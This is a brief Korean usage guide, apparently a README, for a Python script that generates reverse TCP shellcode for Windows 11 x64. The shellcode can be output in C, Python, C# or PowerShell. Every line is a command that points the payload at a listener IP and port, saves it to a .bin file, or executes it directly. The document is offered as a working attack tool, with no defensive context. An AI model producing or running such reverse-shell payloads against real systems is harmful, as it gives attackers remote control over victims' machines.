
Windows >= 11 x64용 셸코드
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443
기본 언어는 C 타입 셸코드이며, Python, Csharp 및 powershell도 지원합니다:
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 --language powershell
파일로 저장하려면:
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 --save true
기본 출력 파일은 output.bin입니다:
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 --save true --output shellcode.bin
테스트 및 실행을 위해:
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 -execution true
그리고:
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 -execution true --language powershell --save true --output shellcode.bin